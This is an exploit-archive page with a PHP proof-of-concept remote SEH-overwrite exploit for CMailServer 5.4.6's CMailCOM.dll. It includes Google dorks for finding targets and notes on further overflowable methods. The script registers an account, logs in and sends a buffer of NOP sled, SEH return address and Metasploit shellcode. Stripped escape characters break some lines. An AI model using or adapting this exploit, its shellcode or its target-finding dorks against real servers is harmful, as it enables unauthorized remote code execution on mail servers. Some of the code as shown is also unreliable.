[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : CMailServer 5.4.6 (CMailCOM.dll) Remote SEH Overwrite Exploit
# Published : 2008-07-06
# Author : Nine:Situations:Group
# Previous Title : trixbox (langChoice) Local File Inclusion Exploit (connect-back) v2
# Next Title : Safari + Quicktime <= 7.3 RTSP Content-Type Remote BOF Exploit
<?php
/*
CMailServer 5.4.6 mvmail.asp/CMailCOM.dll remote seh overwrite
proof of concept exploit
by Nine:Situations:Group::bruiser
our site: http://retrogod.altervista.org/
software site: http://www.youngzsoft.net/cmailserver/
Google dorks:
intitle:"Mail Server CMailServer WebMail"
intitle:"Mail Server CMailServer WebMail 5.4.6"
Some notes:
This server provides a IIS/webmail interface and a registered component
vulnerable to multiple buffer overflows, among the others, the
CMailCom.POP3 class with CLSID 6971D9B8-B53E-4C25-A414-76199768A592.
This class is called by various ASP scripts inside the main folder...
I found this clear vector, look mwmail.asp , lines 25-35:
...
Set objPOP3 = CreateObject("CMailCOM.POP3.1")
objPOP3.Login Session("User"), Session("Pass")
Session("LoginSuccess") = objPOP3.LoginSuccess
If Session("LoginSuccess") = 1 Then
set rs=Server.createobject("adodb.recordset")
rs.open "mailfolder",Conn,1,3
i = 0
arrString = Split(Request("indexOfMail"), ";", -1, 1)
While Len(arrString(i)) <> 0
strUID = arrString(i)
objPOP3.MoveToFolder strUID ' <---------------- bof
...
By attaching olly to the w3wp.exe sub-process you will see the usual
dump with ecx and eip owned, with a buffer of approxymately 13000 chars.
Exploitation is post-auth but you can have a user account by simply
browsing the signup.asp page, enabled by default.
Calc.exe will run with NETWORK SERVICE privilege, check tasks. Note
that 4-5 failed exploit attempts may result in IIS "Service
Unavailiable" message.
Other attacks are possible, see a list of locally overflowable
methods:
CreateUserPath, Logout, DeleteMailByUID, MoveToInbox, MoveToFolder,
DeleteMailEx, GetMailDataEx, SetReplySign, SetForwardSign, SetReadSign.
Note also that remotely there's some kind of validation (ex. you can
not have a username with a length of more than 4000 chars which
could be used instead to overflow the CreateUserPath method and
you cannot overflow ex. through the strUID argument) which reduces a lot
the remote vectors. However, as you can see there's no filter on
"indexOfMail" one.
Other notes:
CMailCOM.SMTP class with CLSID 0609792F-AB56-4CB6-8909-19CDF72CB2A0
is also vulnerable in the following methods:
AddAttach, SetSubject, SetBcc, SetBody, SetCc, SetFrom,
SetTo, SetFromUID
*/
error_reporting(7);$host=$argv[1];$path=$argv[2];
$argv[3] ? $port = (int) $argv[3] : $port = 80;
print ("CMailServer 5.4.6 mvmail.asp/CMailCOM.dll remote seh overwriten".
"exploitn".
"by Nine:Situations:Group::bookoon");
$argv[2] ? print("attackin'...n") : die ("syntax: php ".$argv[0]." [host] [path] [[port]]n".
"example: php ".$argv[0]." 192.168.0.1 /mail/ n".
" '' php ".$argv[0]." 192.168.0.1 / 81 n");
$url = "http://$host:$port";
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
$win ? dl("php_curl.dll") : dl("php_curl.so");
//borrowed from bookoo
function send($packet,$out) {
global $url, $data;
if (!extension_loaded("curl"){
die("you need the curl extesion loaded to run...");
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $packet);
$data = curl_exec($ch); if (curl_errno($ch)) {
print curl_error($ch)."n";
} else {
curl_close($ch);
}
if ($out) print($data."n");
}
$agent="Mozilla/5.0 (Windows; U; Windows NT 5.2; it; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15";
//subscribe
$usr="bookoo";$pwd="password";//new usr username & password, change
$d ="Signup=1&Account=$usr&Pass=$pwd&RePass=$pwd&UserName=&Comment=User&POP3Mail=%40ieqowieoqw.com";
$h ="POST ".$path."signup.asp HTTP/1.0rnHost: $hostrnUser-Agent: $agentrnContent-Type: application/x-www-form-urlencodedrnContent-Length: ".strlen($d)."rnConnection: Closernrn$d";
send($h,0);
$tmp=explode("Set-Cookie: ",$data);
for ($i=1; $i<count($tmp);$i++){ $tmpi=explode(" ",$tmp[$i]);$sess=$tmpi[0];$pos=strpos($sess, "ASPSESSIONID"); if ($pos === true) break; echo $sess."n";}
//login
$d ="User=$usr&Pass=$pwd&SaveUserPass=on";
$h ="POST ".$path."login.asp HTTP/1.0rnHost: $hostrnUser-Agent: $agentrnContent-Type: application/x-www-form-urlencodedrnContent-Length: ".strlen($d)."rnCookie: $sess SaveUserPass=1; Pass=$pwd; User=$usr;rnConnection: Closernrn$d";
send($h,0);
//attack
//bad chars: x3b x2f
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=Pex http://metasploit.com
$shellcode =
"x2bxc9x83xe9xdexe8xffxffxffxffxc0x5ex81x76x0excf".
"x67x5fx11x83xeexfcxe2xf4x33x8fx1bx11xcfx67xd4x54".
"xf3xecx23x14xb7x66xb0x9ax80x7fxd4x4exefx66xb4x58".
"x44x53xd4x10x21x56x9fx88x63xe3x9fx65xc8xa6x95x1c".
"xcexa5xb4xe5xf4x33x7bx15xbax82xd4x4exebx66xb4x77".
"x44x6bx14x9ax90x7bx5exfax44x7bxd4x10x24xeex03x35".
"xcbxa4x6exd1xabxecx1fx21x4axa7x27x1dx44x27x53x9a".
"xbfx7bxf2x9axa7x6fxb4x18x44xe7xefx11xcfx67xd4x79".
"xf3x38x6exe7xafx31xd6xe9x4cxa7x24x41xa7x97xd5x15".
"x90x0fxc7xefx45x69x08xeex28x04x3ex7dxacx67x5fx11";
$jmp_short="xebx10x90x90";
$seh="xf1xdax02x10"; #0x1002DAF1 cmailcom.dll / pop ecx - pop - ret
$nop=str_repeat("x90",12648);
$bof= $nop . $jmp_short. $seh . str_repeat("x90",24). $shellcode ;
$d="sel=aaaa&ToFolder=4&indexOfMail=".urlencode($bof)."&mailcount=1&pages=";
$h ="POST ".$path."mvmail.asp HTTP/1.0rnHost: $hostrnUser-Agent: $agentrnContent-Type: application/x-www-form-urlencodedrnContent-Length: ".strlen($d)."rnCookie: $sess SaveUserPass=1; Pass=$pwd; User=$usr;rnConnection: Closernrn$d";
send($h,1);
?>
# www.Syue.com [2008-07-06]